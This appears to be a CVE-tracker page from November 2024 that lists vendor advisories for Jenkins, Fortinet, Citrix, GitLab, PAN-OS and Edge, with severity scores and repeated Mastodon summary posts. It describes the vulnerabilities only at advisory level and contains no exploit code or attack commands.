Jenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing the job name with JavaScript on the Authorization view, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. Authorize Project Pl

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-49025
(5.4 MEDIUM)

EPSS: 0.05%

updated 2024-11-14T21:32:11

4 posts

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

screaminggoat at 2024-11-14T20:13:10.334Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

##

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

screaminggoat at 2024-11-14T20:13:10.334Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

##

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

CVE-2024-36513
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T20:35:26.093000

1 posts

A privilege context switching error vulnerability [CWE-270] in FortiClient Windows version 7.2.4 and below, version 7.0.12 and below, 6.4 all versions may allow an authenticated user to escalate their privileges via lua auto patch scripts.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-36509
(4.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T20:33:44.727000

1 posts

An exposure of sensitive system information to an unauthorized control sphere vulnerability [CWE-497] in FortiWeb version 7.6.0, version 7.4.3 and below, version 7.2.10 and below, version 7.0.10 and below, version 6.3.23 and below may allow an authenticated attacker to access the encrypted passwords of other administrators via the "Log Access Event" logs page.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-8068(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T18:30:34

3 posts

Privilege escalation to NetworkService Account access in Citrix Session Recording when an attacker is an authenticated user in the same Windows Active Directory domain as the session recording server domain

screaminggoat@infosec.exchange at 2024-11-13T14:17:04.000Z ##

The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.

#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr

##

GossiTheDog@cyberplace.social at 2024-11-12T21:22:55.000Z ##

If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).

It’s a niche scenario for direct internet access.

Vendor advisory: support.citrix.com/s/article/C

Technical write up: labs.watchtowr.com/visionaries

Shodan dork: beta.shodan.io/search?query=ht

Citrix have used terms like “limited RCE” and “intranet” 🤨

##

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity

##

CVE-2024-50252
(5.5 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T18:08:17.857000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_ipip: Fix memory leak when changing remote IPv6 address The device stores IPv6 addresses that are used for encapsulation in linear memory that is managed by the driver. Changing the remote address of an ip6gre net device never worked properly, but since cited commit the following reproducer [1] would result in a

CVE-2024-52554
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T15:42:42

1 posts

Jenkins Shared Library Version Override Plugin 17.v786074c9fce7 and earlier declares folder-scoped library overrides as trusted, so that they're not executed in the Script Security sandbox, allowing attackers with Item/Configure permission on a folder to configure a folder-scoped library override that runs without sandbox protection. This allows attackers with Item/Configure permission on a folder

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52550
(8.0 HIGH)

EPSS: 0.04%

updated 2024-11-14T15:41:49

1 posts

Jenkins Pipeline: Groovy Plugin 3990.vd281dd77a_388 and earlier, except 3975.3977.v478dd9e956c3 does not check whether the main (Jenkinsfile) script for a rebuilt build is approved, allowing attackers with Item/Build permission to rebuild a previous build whose (Jenkinsfile) script is no longer approved. This allows attackers with Item/Build permission to rebuild a previous build whose (Jenkinsfil

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52553
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T15:37:53

1 posts

Jenkins OpenId Connect Authentication Plugin 4.418.vccc7061f5b_6d and earlier does not invalidate the previous session on login. This allows attackers to use social engineering techniques to gain administrator access to Jenkins. OpenId Connect Authentication Plugin 4.421.v5422614eb_e0a_ invalidates the existing session on login.

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52549
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T15:35:55

1 posts

Jenkins Script Security Plugin 1367.vdf2fc45f229c and earlier, except 1365.1367.va_3b_b_89f8a_95b_ and 1362.1364.v4cf2dc5d8776, does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to check for the existence of files on the controller file system. This allows attackers with Overall/Read permission to check for the existence o

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-8648
(6.1 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T15:32:16

1 posts

An issue has been discovered in GitLab CE/EE affecting all versions from 16 before 17.3.7, 17.4 before 17.4.4, and 17.5 before 17.5.2. The vulnerability could allow an attacker to inject malicious JavaScript code in Analytics Dashboards through a specially crafted URL.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-5917(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:09

1 posts

A server-side request forgery in PAN-OS software enables an unauthenticated attacker to use the administrative web interface as a proxy, which enables the attacker to view internal network resources not otherwise accessible.

1 repos

#search_error

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-9472(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:08

1 posts

A null pointer dereference in Palo Alto Networks PAN-OS software on PA-800 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series hardware platforms when Decryption policy is enabled allows an unauthenticated attacker to crash PAN-OS by sending specific traffic through the data plane, resulting in a denial of service (DoS) condition. Repeated attempts to trigger this condition will result in P

1 repos

#search_error

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-2552(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:08

1 posts

A command injection vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to bypass system restrictions in the management plane and delete files on the firewall.

1 repos

#search_error

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-5920(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-write Panorama administrator to push a specially crafted configuration to a PAN-OS node. This enables impersonation of a legitimate PAN-OS administrator who can perform restricted actions on the PAN-OS node after the execution of JavaScript in the legitimate PAN-OS administrator's browser

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-5918(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

An improper certificate validation vulnerability in Palo Alto Networks PAN-OS software enables an authorized user with a specially crafted client certificate to connect to an impacted GlobalProtect portal or GlobalProtect gateway as a different legitimate user. This attack is possible only if you "Allow Authentication with User Credentials OR Client Certificate."

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-5919(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate arbitrary files from firewalls to an attacker controlled server. This attack requires network access to the firewall management interface.

1 repos

#search_error

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-8180
(5.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 before 17.3.7, 17.4 before 17.4.4, and 17.5 before 17.5.2. Improper output encoding could lead to XSS if CSP is not enabled.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-9693
(8.6 HIGH)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

An issue was discovered in GitLab CE/EE affecting all versions starting from 16.0 prior to 17.3.7, starting from 17.4 prior to 17.4.4, and starting from 17.5 prior to 17.5.2, which could have allowed unauthorized access to the Kubernetes agent in a cluster under specific configurations.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-2550(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:01

1 posts

A null pointer dereference vulnerability in the GlobalProtect gateway in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to stop the GlobalProtect service on the firewall by sending a specially crafted packet that causes a denial of service (DoS) condition. Repeated attempts to trigger this condition result in the firewall entering maintenance mode.

1 repos

https://github.com/EQSTLab/CVE-2024-25503

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
